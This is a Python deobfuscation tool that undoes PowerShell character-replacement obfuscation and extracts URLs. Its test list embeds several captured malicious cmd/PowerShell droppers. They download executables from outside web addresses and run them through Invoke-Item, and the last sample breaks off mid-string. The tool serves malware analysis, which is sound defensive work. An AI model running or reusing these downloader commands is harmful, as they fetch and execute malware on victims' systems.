#!/usr/bin/env python
import re, sys, base64, argparse

__author__  = "Jeff White [karttoon] @noottrak"
__email__   = "karttoon@gmail.com"
__version__ = "1.0.0"
__date__    = "09DEC2017"

def replaceDecoder(inputString, args):

    if args.debug:
        print "Original: %s" % inputString

    inputString = inputString.replace("'+'", "")

    if "|" in inputString:
        if "replace" not in inputString.split("|")[-1]:
            inputString = "|".join(inputString.split("|")[0:-1])
        else:
            pass

    while "replace" in inputString.split(".")[-1].lower() or "replace" in inputString.split("-")[-1].lower():

        inputString = inputString.replace("'+'", "")

        if len(inputString.split(".")[-1]) > len(inputString.split("-")[-1]):

            tempString = "-".join(inputString.split("-")[0:-1])
            replaceString = inputString.split("-")[-1]

            if "[" in replaceString.split(",")[0]:
                firstPart = " ".join(replaceString.split(",")[0].split("[")[1:]).replace("'", "").replace('"', "")

            elif "'" in replaceString.split(",")[0].strip() or '"' in replaceString.split(",")[0].strip():
                firstPart = re.search("(\'.+?\'|\".+?\")", replaceString.split(",")[0]).group().replace("'", "").replace('"', "")

            else:
                firstPart = replaceString.split(",")[0].split("'")[1].replace("'", "").replace('"', "")

            secondPart = replaceString.split(",")[1].split(")")[0].replace("'", "").replace('"', "")
        else:
            tempString = ".".join(inputString.split(".")[0:-1])
            replaceString = inputString.split(".")[-1]
            firstPart = replaceString.split(",")[0].split("(")[-1].replace("'", "").replace('"', "")
            secondPart = replaceString.split(",")[1].split(")")[0].replace("'", "").replace('"', "")

        if "+" in firstPart:

            newFirst = ""

            for entry in firstPart.split("+"):
                newFirst += chr(int(re.search("[0-9]+", entry).group()))

            firstPart = newFirst

        if re.search("char", firstPart, re.IGNORECASE):
            firstPart = chr(int(re.search("[0-9]+", firstPart).group()))

        if "+" in secondPart:

            newSecond = ""

            for entry in secondPart.split("+"):
                newSecond += chr(int(re.search("[0-9]+", entry).group()))

            secondPart = newSecond

        if re.search("char", secondPart, re.IGNORECASE):
            secondPart = chr(int(re.search("[0-9]+", secondPart).group()))

        if args.debug:
            print "First: %s" % firstPart
            print "Second: %s" % secondPart

        tempString = tempString.replace(firstPart, secondPart)
        inputString = tempString

        if "replace" not in inputString.split("|")[-1].lower():
            inputString = inputString.split("|")[0]

        if args.debug:
            print "Modified: %s" % inputString

    return inputString

def scrapeUrls(dataDecoded, urls):

    if "http" in dataDecoded.lower():
        try:
            httpUrls = re.search("(\'|\")http.+?(\'|\")", dataDecoded, re.IGNORECASE).group()

            for url in httpUrls.replace("'", "").replace('"', "").split(","):
                if url not in urls:
                    urls.append(url)
        except:
            pass

    return urls

def main():
    parser = argparse.ArgumentParser(description="Attempt to deobfuscate PowerShell char replacement technique.")
    parser.add_argument("-d", "--debug",
                        help="Print debug information.",
                        action="store_true")
    parser.add_argument("-i", "--input",
                        help="Base64 encoded input or a simple string.",
                        metavar="<input>")
    parser.add_argument("-t", "--test",
                        help="Run through a number of variations to test changes.",
                        action="store_true")
    args = parser.parse_args()

    testList = [
        '\nWindows\\SysWOW64\\cmd.exe , cmd giugui iwegegge e e e e e e eh hoidf hweo fhowe & %C^om^S^p^Ec% /V /c set %FnpjQdORpqrKZnz%=BiusbEhp&&set %CPzUzjSccK%=o^we^r^s&&set %oaXpPPMWjEuIfja%=vVDwShRRokLDCh&&set %DHoQiFqc%=p&&set %SBFzupGYCZdUiUs%=ofUIwwGAlXHJFBi&&set %pKRZnufRZ%=^he^l^l&&set %EJTwltDfmlrXTiS%=zDwZzEquGlMATcm&&!%DHoQiFqc%!!%CPzUzjSccK%!!%pKRZnufRZ%! " & ( $PShome[4]+$pshoME[34]+\'x\') ((\'& (\'+\' \'+\'krgpShOMe[4]+krgpsHome[30]+m85xm85) ( ((m85 (VabwbVab+VabWfranc = newVab+Vab-oVab+VabbjVab+Vabect Vab+VabSystVab+Vabem.Net.Vab+Vm85+m85abWVab+Vabem85+m85bClienVab+VabtVab+Vab;wbW\'+\'nsadaVab+VabsVab+VabdVab+Vab Vab+Vab=Vam85+m85b+Vm85+m85ab nVab+VabeVab+Vabw-om85+m85Vab+VabbjeV\'+\'ab+VabcVab+Vabt Vab+VabranVab+Vabdom;wVab+VabbWbcd =Vab+Vab x1nhttp:Vab+Vab/Vab+Vm85+m85a\'+\'b/Vab+VabcoVab+Vabh\'+\'Vab+Vabomm85\'+\'+m85esVab+VabdenverVab\'+\'+Vab.cVab+Vabom/HVab+VabRVab+VabM\'+\'Vab+Vab2z/,httpsVab+Vab://dVab+Vabestm85+m85iVab+VabnoVab+V\'+\'absVab+Vabcusco.\'+\'com/RulVab+VabrP/Vab+Vm85+m85ab,http:Vab+Vab//ethVab+VabconVab+Vab\'+\'nem85+m85cVab+VabtVab+Vab.cVab+Vabm85+m85\'+\'cVab+Vab/f0oVabm85+m85+VabkLK/,Vab+Vabhttp://so1Vab+VabtrantVab+Vabhudm8\'+\'5+m\'+\'85o.Vab+Vabnet/k60Vab+VabH/,ht\'+\'Vab+m85+m85VabtpVab+Vab:Va\'+\'m85+m85b+Vab//epicevenVab+VabtVab+VabsVab+Vabum85+m85sa.co\'+\'m/wRhJVab+VabFj/Vab+Vabx1n.SpVab+Vablit(x1n,x1nVab+Vab);wbWkarapVab+Vabas = Vab+Vabwm85+m85bWVab+VabnVab+Vabsadasd.Vm85+m85ab+VabnVab+VabeVab+VabxtVab\'+\'m85+\'+\'m85+V\'+\'ab(Vab+Vab1, Vab+Vab3Vab+Vab43245)Vab+Vab;Vab+Vabwbm85+m85WVab+Vabhum85+m85as Vab+Vab= wbWeVab+Vabnv:pubVab+Vablic Vab+Vab+ Vab+Vabxm85+m851nPgJVab+Vabx1n + Vabm85+m85+Vabw\'+\'bWkarapa\'+\'s +Vab+Vab V\'+\'ab+VabxVab\'+\'+Vab1nVab+Vab.exVab+VabeVab+Vabx1n;fm85\'+\'+m85Vab+VaboVab+Vabr\'+\'Vab+m85+m85VabeVab+VabacVab+Vabh\'+\'(Vab+Va\'+\'m85+m85bwbVab+VabWaVab+VabbVab+Vabc in Vab+VabwbWbVab+VabcVab+Vm85+m85abdVab+Vab){tVab+\'+\'VabrVab+VabyVab+Vab{wbVab+Vm85+m85abWfVab+VabrVab+Vabancm85+m85.DownVab+\'+\'VabloadF\'+\'ile(wbWVabm85+m85+Vababc.ToVab+VabStVab+V\'+\'abring()Vab+Vab, wbWhm85+m85uas);Vab+VabIVab+Vabnvokm85+m85e-Vab+VabIVab+\'+\'Vabtem(wVab+VabbVab+VabWVab+Vabhuam85+m85sVab+Vab);breaVab+VabkVab+Vab;}Vab+VabcaVm85+m85ab+VabtchVab+Vab{Vab+Vm85+m85abwritVam85+m85b+\'+\'VabeVab+m85+m85Vab-hostVab+Vab Vab+VabwbW_.ExceVab+Vabption.\'+\'MeVab+\'+\'Vam85+m85bsm85+m85\'+\'sagVab+VabeVab+Va\'+\'b;}Vab+Vab}Vab).rePLAcE(Vabx1nVab,m85+m85[sTm85+m85RiNG][chAR]39).rePLm85+m85AcE(([chAR]80+[chAR]103+m85+m85[chARm85+m85]74),m85+m85[sTRiNG][chARm8\'+\'5+m85]9m85+m\'+\'852).rePLAcE(([chAR]119+[chAR]98+[chARm85+m85]87),[sTRiNm85+m85G][chm85+m85AR]36\'+\')uAB&( 0q8enVm85+m85:public[13]+0q8enV:PuBlIC[5]+VabxVab)m85) -CReplAcE m85uABm85,[cHAR]124 -CReplAcE\'+\'m850q8m85,[cHAR]36 -CRe\'+\'plAcE m85Vabm85,[cHAR]39) ) \').REpLAcE(([ChaR]107+[ChaR]114+[ChaR]103),[StRING][ChaR]36).REpLAcE(\'m85\',[StRING][ChaR]39))\n',
        '\nWindows\\SysWOW64\\WindowsPowerShell\x0b1.0\\powershell.exe , powershell " &( $vERBOSEprefeRENCE.TOstRInG()[1,3]+\'x\'-jOiN\'\')((\'. ((VAriAble rAb*m\'+\'DR*rAb)\'+\'.namE[3,11,\'+\'2]-joiNrAbrAb) ( (rAb ((8mrAb+rAb6o4Vfranc r\'+\'Ab+rAb8m6+8m6=rAb+rAb new-8m6\'+\'+8m6obj8m6+8m6ecrAb+rAbt SysrAb+rAbt8m6+8m6em.Ne\'+\'t\'+\'.We8m6rAb+rAb+8m6bCli8m6+8m6enrAb+rAbt8rAb+rAbm6+8m6;8m6+8m6o4Vnsa8m6+8m6dasd 8m6+\'+\'8m6= n8m6+8m6e8m6+8m6w-8m6+8m6object 8m6+\'+\'rAb+rAb8mrAb+rAb6random;o4Vb8m6+8m6c8m6+8m6d = Ha6ht8m6+8m6t8m6+8m6p:8m6+8m6//s8m6+8m6mart8m6+8m6\'+\'-8m6+8m6soft.pl/w8m6+8m6ef3rAb+rAb8m6+8m64668m6+8m6\'+\'48m6+8rAb+rAbm658m6+8m6,htt8m6+8mrAb+rAb6p8m6+8m6:rAb+rAb8m6+8m6/\'+\'8m6+8m6/chimach8m6+8m6i8m6+8m6n8m6+8m6eno8m6+8m6w.com/wrAb+rAb8m6\'+\'+8m6efrAb+rAb348m6+8m666458m\'+\'6+8m6,htt8m6+8mrAb+rAb6prAb+rAb://8m6+\'+\'8m6truhlarstvi-be8m6+8m6\'+\'zd8m6+8m\'+\'6eka8m6+8rAb+rA\'+\'bm6.c8m6+8rAb+rAbm6z/wef346645,h8m6+8m6ttrAb+rAb8m6+8m6p8m6+8m6://8m6+8m6er8m6+8m6icajoy.co8m6+8m6m/8m6+8m6wef3468m6+8m6645Ha6.Sp8mrAb+rAb6+8m6lit(H8m6+8m6a6,H8rAb+rAbm6+8m6a6\'+\')8m6+8rAb+r\'+\'Abm6;8m6+8m6o4V8m6+8m6kara8m6+8m6pas = o8m6+8m64\'+\'Vns8m6+8m6adasd.next(18m6+8m6,rAb+rA\'+\'b 38m6+8m6rAb+rAb43248m6+8m658m6+8mrAb+rAb6);o4Vhuas = o4Ve8m6+8m6nv:p8m6+8m6ublic +8m6rAb+rAb+8m6 Ha61U8m6+8m6nH\'+\'8m6\'+\'+8m6a6 +rAb+rAb o48m6+8m6Vkar\'+\'8m6+8m6apas 8m6+8m6+ Ha6.e8m6+8m6xe8m6+8m6Ha\'+\'8m6+8m668m6+8m6;8m6rAb+rAb+8m6for8m6+8m6ea\'+\'c8m6+8m6h(o8m6+8m64VrAb+rAbab8m6+8m6c in 8m6+8m6o48m6+8m6Vb8m6+8m6c8m6+8m6d){\'+\'8m6+8m6try{o48m6+8m6\'+\'V8m6+8m6f8m6+8m6r8m6\'+\'+8m6a8m6+8m6n8m\'+\'6r\'+\'Ab+rAb+8m6c.Downlo8m6+8m6adFile(o4Vab8m6+8rAb+rAbm6c8m6+8m6.TrAb+rAboSt8m6+8m6r8m6+8m6in8m6+8m6g(8m6+8m6)8m6+8m6, o48m6+8m6Vhua8m6+8m6s);Invoke-Item(o4Vhuas);8m6+\'+\'8m6br8m6+8m6eak;}catch8m6\'+\'+8m6{wrrAb\'+\'+rAb8m6+\'+\'8m6i8m6+8m6te8m6+8m6-host\'+\' rAb+rAbo48rAb+rAbm6\'+\'+8m6V_.Ex8m6+8m6c\'+\'e8m6+8m6pt8\'+\'m6+8rAb+rAbm6ion8m6\'+\'+8m6.MrAb+rAb8m6+8m6es8m6+8mrAb+rAb6rAb+\'+\'rAbsa8m6+8m6g8m6+8m\'+\'6e;}}8\'+\'m6\'+\')-CREpLACE 8m61Un8m6\'+\',\'+\'[chaR]92 -CrA\'+\'b\'+\'+rAbREprAb+rAbLACE([chaR]111+[chaR]52+[chaR]86)\'+\',[cha\'+\'R]36 -CR\'+\'EpLACE ([chrAb+rAbaR]72+[chaR]97+[chaR]54),[chaR]39) f5B &((GeT-VaRIAbLe rAb+rAb8m6*MDR*8m6).Name[3,11,2]\'+\'-JoIn8m68m6)rAb).rEpLA\'+\'Ce(([\'+\'c\'+\'har]5\'+\'6+[char]109+[c\'+\'har]54),[StRiNG][char]39).rE\'+\'pLAC\'+\'e(rAbf5BrAb,[StRiNG][char]124) ) \').rEPLAcE(\'rAb\',[StRING][ChAr]39) )\n',
        '\n<null> , CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %JTSAqpAjHcZbLjG%=PlNPiXAjH&&set %qqCVQYFVqHE%=owe^r^s&&set %nvqoHIMkKadlFvs%=OLMtmRtHTTNij&&set %FQAKUVHNFEwkd%=p&&set %KmTisDtKvAUMrBJ%=dbJqUZQLnqUVCiU&&set %JTERVYvG%=^he^l^l&&set %ovhBzoKDNszjSLs%=juQjirJXKJuajrX&&!%FQAKUVHNFEwkd%!!%qqCVQYFVqHE%!!%JTERVYvG%! " ((\'& ( qDuS\'+\'hELLid[1]+qDuShELliD[13]+Mn8xMn8\'+\')((Mn8IeX (((n36dn36+n36\'+\'pifnMn8+Mn836+n36ranc = newn36+n36-n36+n36object n36+n36Systn36+n36em.Net.We\'+\'bClient;dpinsad\'+\'asdn3Mn8+\'+\'Mn86+n3Mn8+Mn8\'+\'6 = new-obj\'+\'ecn36+n36t rn36+n36andom;n36+n3\'+\'6dn36+n36pin36+n36Mn8+Mn8bcd =n36+n36 n36+n36bvn36+n36jhttp://n36+n36devn36+n36.cn36+n\'+\'36an36+n36k-host.n36+n36com/hypn\'+\'36+n36xn36+n36mor\'+\'.exenMn8+Mn836+n36,http://h\'+\'an36+n36rd-groon36+Mn8+Mn8n36vn3Mn8+Mn86+n36es.n36+n\'+\'36com/mhjcyn36+n36rn36+n\'+\'36d.Mn8+Mn8ex\'+\'e,ht\'+\'tpn36+n36://Mn8+Mn8n36+n36hn36+n36eln36+n3Mn8+Mn86ln36+Mn8+Mn8n36onwheelstn36+n3\'+\'6hn36+n36emovie.comn36+n36/n36+n36vkkmoyh.exe,Mn8+M\'+\'n8http://hin36+n36ghn36+n36lan36+n36ndfamn36+n36ily.Mn8+Mn8oMn8+Mn8rg/hn36+n36ctn36\'+\'+n36tg\'+\'Mn8+Mn8wa.n36+nMn8+Mn836eMn8+Mn8xe,http:Mn8+Mn8/n36+n36/\'+\'ki\'+\'shi7n36+n363.com\'+\'n36+n36.br/n36+n36rermn36+n36rn36+n36xpn36+n36.exebvn36+n36j.Mn\'+\'8+Mn8n\'+\'36+n36\'+\'Spn36+n36lin36+n36\'+\'t(bvMn8+Mn8jn36\'+\'+nMn8\'+\'+Mn836,bvj);dn36+n36p\'+\'i\'+\'kn36+n36arap\'+\'Mn8+Mn8n36+n36as = dpin36+n36nsan36+\'+\'n36dan36+n36sn36+n3Mn8+Mn86d.nn36+n36exn36+n3\'+\'6t(1, 343n36+\'+\'n36245);dpin36+n36huasn36+n36 Mn8+Mn8= n36+n36dpn36+n36ienv:pu\'+\'blic Mn8\'+\'+Mn8n36+n36+ bn\'+\'36+n36vMn8+Mn8jbP6bn36+n36vjMn8+M\'+\'n8 Mn8+Mn8n36+n36+n36+n36 dpin36+n36karn36+n36apas +nMn8+Mn836+nMn8+Mn836 n36+n36bvn36+n36j.exebn36+n36vj;forn36+n36en36+n3Mn8+Mn86achn36+n36(dpiabn36+n36cn36+n36 n36+n36i\'+\'n36+n36n dpibcd){try{n36\'+\'+n36dpifn36+n36ran36+n36nn36+n36c.n36+n36Dn36+n\'+\'36ownloaMn8+Mn8dFileMn8+Mn8n36+n36(n36+n36Mn8+Mn8dp\'+\'n36+n36iabc.ToMn8+Mn8String(),n36+n36 n36+n3Mn8+Mn86dp\'+\'Mn8+Mn8ihn36+n36uan36+n36s);n36Mn8+Mn8+n3Mn8+Mn86Inn36+n36vnMn8+M\'+\'n\'+\'836+\'+\'n36oke-n36+n36Item(dpn36+n36in36+n36hn36+n36uan36+n36s);break;n36+n36}cMn8+Mn8atch{wrn36+n36ite-n3Mn8+\'+\'Mn86+n36hn36+n36ost dn3Mn8+Mn86+n36pn36+n3Mn8+Mn86i_.Excn36+n36eptionn36+n36.Mn3\'+\'6+n36essage;n36+n36}}n3Mn8+Mn86)-Cr\'+\'ePLAce ([chaR]98\'+\'+[chaR]11\'+\'8+[chaR]106),[chaR]39 -REpLAcE n36bP6n36,[chaR]92 -CrePLAce n36dpin36,[chaR]36)) Mn\'+\'8\'+\').rEPLACe(Mn8n36Mn8,[STrING][\'+\'Char\'+\']39) ) \')-Replace\'Mn8\',[ChAr]39 -crEPlaCE \'qDu\',[ChAr]36) | &( ([strING]$VERboSEPreFErenCE)[1,3]+\'X\'-JOIn\'\')\n',
        '\nWindows\\SysWOW64\\cmd.exe , CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %wwHHYUcSQFKmKaQ%=jTiEnrzUA&&set %uabSAfsGF%=owe^r^s&&set %TRJwOjmUwjvIzDX%=iVLWSdrwa&&set %cnqTWliaD%=p&&set %LzWKtRHzdHoHKiE%=hSqqifIiQHaRfdC&&set %kVnsnzZLa%=^he^l^l&&set %WcUimPMcaiYwipO%=PTrHpznASvDQGCT&&!%cnqTWliaD%!!%uabSAfsGF%!!%kVnsnzZLa%! " (\' (53h .( sITenV:PUbLIC[13]+sITeNV:PuBLic[5]+hOmXhOm) 53h+5\'+\'3h\'+\'((hOmrHIhOm+hOmfhOm+hOmran\'+\'c = hOm+hOmnew-ohOm+hOmbject System.hOm+hOmNethOm+hOm.WehOm\'+\'+hOmbChOm+h\'+\'Omlient;rhO\'+\'m+hOmH53h+53hIhOm+hOmns\'+\'hOm+hOmadasd =hOm+hOm new-ohOm+hOmbjehOm+hOmct r\'+\'hOm+hOmandohOm+hOmm;rHIbcd hOm+hOm= YXhOm+hOm53\'+\'h+53hAhhOm+53h+5\'+\'3hhOm\'+\'tthOm+hOmp:/\'+\'/pam53h+53hphOm+hOmlona53h+53hrecadohOm+hOms.comhOm+hOm/pbuxhO\'+\'m+hOmehO53h+53hm+hOmgx.exehOm+hOm,hOm+h53h+53hOmhthOm+hOmtp://hOm+hOmmoghOm+hOmaleenhOm+hOmghOm+53h+53hhOminehOm+hOmehOm+hOmrhOm+hOmihOm+hOmnghOm+hOm.co.zhOm+hOma/kbqthOm+hO53h+53hmqahOm+hOmy.hOm+hOm53h+53hexe,http:hOm+hOm//hOm+hO\'+\'msean\'+\'a\'+\'ndahOm+hOmarhOm+hOmohOm+hOmn.cohOm+hOmm/hOm+hOmhxhOm+hOmbwe\'+\'pq.exe,hOm53h+53h+hOmhtthOm+hOmp:hOm+hOm//53h+53hhOm+hOmafihOm+h53h+53hOmrmacrhOm+hOmeativihOm+hOmdad.cohOm+hOmm/fhjhOm+hOmxchOm+hOmihOm+h\'+\'Omt.exe,hOm+hOmhttphOm+hOm://dischia\'+\'vi.hOm+hO\'+\'mnehOm+53h+53hhOmthOm+hOm/\'+\'ehnuvtg.exhOm+hOmeYhOm+hOmXA.hO53h+53hm+hOmSplit(53h+53hYhOm+\'+\'hOmXA,YhOm+hOmXA);rHIkhOm+hOmarhOm+hOmapas =hO\'+\'m+hOm rHInshOm53h+53h+hOmad53h+53h\'+\'ahOm+hOmshOm+hOmd.hOm+hOmnehOm+hOmxhOm+hOmt(1, 3hOm+hOm4hO53h+53hm+hOm324hOm+hOm5);rhOm\'+\'+hOmHIhOm+hOmhua53h+53hs 53h+53h= hOm+hOmrHhOm+hOmIenv:puhOm+hOmblhOm+hOmichOm+hOm + YXAQLchO53h+53hm+hOmYXA +hOm+hOm rHhOm+hOmI\'+\'hOm+hOmkhOm+hOmarhOm+hOmapahOm+hOms + Y53h+53hhOm+hOmXA.ehOm+hOmxeYhOm+hOmXA;f53h+53horeachOm+hOmh(hOm+h53h+53hOmrHhOm+hOmIahOm+hOmbc hOm+h\'+\'OmihOm+hOmn hOm+hOmrhOm+hOmHhOm+hOmIbcd){thOm+hOmry{rHIf5\'+\'3h+53hra\'+\'nc.DownhOm+hOmloa\'+\'dFhOm+hOmile(hO\'+\'m+hOm53h+53hrHIabc.TohOm+hOmShOm+hOmtrhO53h+53hm+hOming()hOm+hOm, rHIhhOm+hOmuashOm+hOm);IhOm+hOmnv53h+53hhOm+hOmohOm+hOmkhOm+hOme-I\'+\'tehOm+hOmm(rHIhOm+hOmhuas)hOm+hOm;brhOm+hOmehOm+hOmahOm+hOm53h+5\'+\'3hk;}hOm+hOmcat53h+53hch{write-\'+\'hhOm+hOmohOm\'+\'+hOmsthOm+hOm rhOm+hOmHhOm+hOmIhOm+hOm_\'+\'.Exception.hOm+hOmMehOm+hOmsshOm+hOmage;}}hOm).rEPlaCe(hOmYXAhOm,[STRiNg][Char]39).rEPlaCe(([Char]81+[53h+53hChar]\'+\'76+[Char]99),[STRiNg][Char]92).r53h+53h\'+\'EPlaCe(([Char]114+[Char]72+[Char]73),hOm\'+\'sIThOm) )53h).ReplACe(([Char]104+[Char]79\'+\'+[Char\'+\']109),[StRinG][Char]39).ReplACe(([Char]115+[Char]73+[Char]84),[StRinG][Char]36)zwQ&( SOqPSHoME[21]+SOqpsHoME[34]+53h\'+\'x53h)\').replaCE(([cHAR]83+[cHAR]79+[cHAR]113),[sTRINg][cHAR]36).replaCE(\'zwQ\',\'|\').replaCE(\'53h\',[sTRINg][cHAR]39)|iNVoKe-exPrEsSIoN\n',
        '\nWindows\\SysWOW64\\cmd.exe , CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+\'x\'-jOin\'\') ( (\'. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp \'+\'uxp+uxpnew-obVnL+VnL\'+\'uxp+uxp\'+\'jectu\'+\'xp+uxp Suxp+uxpysuxp+VnL+Vn\'+\'L\'+\'uxptem\'+\'.Netu\'+\'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u\'+\'xpsuxp\'+\'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps\'+\'d =uxp+uxpVnL+VnL nuxp+\'+\'uxpeuxp+uxpw-objec\'+\'t VnL+VnLrandom;eAbbcd =\'+\' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH\'+\'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn\'+\'Lpun.co.uxp+uxpuk/npZVn\'+\'L+Vn\'+\'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r\'+\'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp\'+\'p-content/themes-suVnL+VnLspeVnL+V\'+\'nLcted/umuxp+uxpo\'+\'juxp+uxpp43uxp+uxp/uNssVnL+Vn\'+\'Luxp+uxpuwuxp+uxpHS/,http://www.wang\'+\'lb.topux\'+\'p+uxp/wp-conteuxp+\'+\'uxpnt/Td/,h\'+\'ttuxp+uxppuxp+uxp:uxp\'+\'+uxp//uxp+uxpwux\'+\'p+uxpww.uxp+uxpfr\'+\'iuxp+uxVnL+Vn\'+\'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk\'+\'VnL+VnLauxp+uxprapas =uxp+uxp u\'+\'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua\'+\'s = uxp+uxpeAuxp\'+\'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu\'+\'xp+\'+\'uxpj +uVn\'+\'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr\'+\'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+\'+\'VnLnc.Downlo\'+\'adFile(e\'+\'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV\'+\'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp\'+\';break\'+\'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V\'+\'nLp+uxpVnL+VnL.Messuxp+uxpag\'+\'e;}}VnL+VnLuxp)-REplaCE uxpGW9\'+\'uxp,[cHa\'+\'r]92-CREpLaCE ([c\'+\'Har]8\'+\'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6\'+\'5+[cHar]VnL+Vn\'+\'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce\'+\' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c\'+\'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) \').repLacE(\'ctV\',\'$\').repLacE(\'VnL\',[String][char]39) ) \n',
        '\n<null> , cmd wmic & %comspec% /v /c set %MTDLcBfHorkKujU%=qcfGklVTz&&set %SPGOCSUCj%=o^w^e^r^s&&set %fqtMbaSMYmIijjV%=DCjUhTanC&&set %wNNBWZUcL%=p&&set %zBMIvtvqzDjlITf%=NZXlIYlJwJDiBBm&&set %TbdsCQYdj%=^h^e^l^l&&set %jFCqMaNJQfqRjcz%=jvjEGHvofiOrQzs&&!%wNNBWZUcL%!!%SPGOCSUCj%!!%TbdsCQYdj%! "inVoke-eXpressIon( (\'.( lUdpShoME[21]+lUdpSHomE[30]+UeTXUeT) ( ((UeT (htViuLfrhtV+htVahtV+htVnchtV+UeT+UeThtV =UeT+UeT new-\'+\'ohtV+htVb\'+\'h\'+\'tV+htVjhtV+htVecthtV+htV\'+\' System.htV+htV\'+\'Net\'+\'.WebClht\'+\'V+htVient;iuLUeT+UeTnhtV+htVsadahtV+h\'+\'tVsd \'+\'UeT+UeT= nhtV+htVew-objehtV+htVchtV+htVt randomhtV+htUeT+UeTV;\'+\'ihtV+htVuLbhtV+htVcd UeT+UeT= P\'+\'gNhtV+htVhttp://89.24htV+htV8htVUe\'+\'T+UeT+htV.169htV+htV.htV+htV136/bhtV+htVigmac.jphtV+htVgPgN.Split(htV+htVPgh\'+\'tV+\'+\'htVN,PhtV+htVgN)hUeT+UeTtV+hUeT+UeTt\'+\'V;htV+htViuLkarhtV+htVaphtV+htVas htV+htV=UeT+UeT iuLnsadUeT+Ue\'+\'TashtV+htVd.next(1, 3htV+htV43245);iuLhuashtV+htV = ihtV+htVuLenv:public + PgNHScPUeT+UeThtV+htVgN + iuhtV+htVLhtV+htVkarapas + PgN.htV+htVexePhtV+htVgNhtV+htV;htV+htVf\'+\'orhtV+htVeach(iuLabc ihtV+htVnhtV+htV iuLbcUeT+UeTd){trhtV+ht\'+\'Vy{iuLfhtV+htVranc\'+\'htV+htV.DownloadFhtV+htVihtV+htVlehtV+htV(i\'+\'uLaUeT+UeTbc.TohtV+htVStriUeT+UeThtV+htVng()htV+htV, iuLhuas)UeT+UeT\'+\';IhtV+htVnhtV+htVvoUeT+UeTkehtV+htV-IhtVUeT+UeT\'+\'+htVthtV+htVem(htUeT+UeTV+htViuLhuas);break;}catch{wrhtV+htVite-hohtV+h\'+\'tVsthtV+htV iuL_.ExchtV+htVeptionh\'+\'tV+UeT+UeThtV.Message;}}htV).rEplaCe(htVHSchtV,htV4Y9htV).rEplaCe(([CHar]80+[CHar]103\'+\'+[CHar]78),[sTRINg][CHar]39).rEplaCe(([CHar]105+[CHar]117+[CHar]76),htV9SqhtV) 3i7l. ((VarIAblE htV*mDr*htV).nameUeT+UeT[3,11,2]-jOINhtVhtV)\'+\'UeT) -CREplACeUeT3i7lUeT,[cHAr]124-REplace ([cHAr]57+[cHAr]83+[cHAr]113),[cHAr]36 -\'+\'REplaceUeThtVUeT,[cHAr]39 -R\'+\'Eplace UeT4Y9UeT,[cHAr]92) ) \').REPlAce(\'lUd\',\'$\').REPlAce(([char]85+[char]101+[char]84),[STRing][char]39) ) \n',
        '\nWindows\\SysWOW64\\cmd.exe , cmD wMic wMic wMic wMic & %Com^S^p^Ec% /V /c set %PQzorcruksdsGFj%=wiGpLYv&&set %KMcIQsBf%=o^we^r^s&&set %ZulWOAOtHHTNSkj%=ofBBZZVXPFiaW&&set %HbacbzHU%=p&&set %fEHrVZtFFctWwWl%=nrOPMoSKKXVzZOG&&set %aVmXvtjPjUMXN%=^he^l^l&&set %JWoXbCLWzKpkiCH%=faDkkYrPNiNuwUz&&!%HbacbzHU%!!%KMcIQsBf%!!%aVmXvtjPjUMXN%! " . ( $enV:comspEC[4,24,25]-jOIn\'\')( ((\' ((5ht iEx ( (C5Rna3francC5R+C5R = newC5R+C5R\'+\'-obj5ht+5htect SystC5R+C5Rem.C5R+C5ht+5ht5RNC5R+C5RetC\'+\'5R+C5R.WeC55ht+5htR+C5RbClientC5R+C5R;na3nsC5R+C5Radasd = neC5R+C5Rw-o\'+\'bjecC5R+C\'+\'5Rt raC5ht+5ht5R+C\'+\'5Rndom;na3bcdC5R+5ht+5htC5R5ht+5ht = 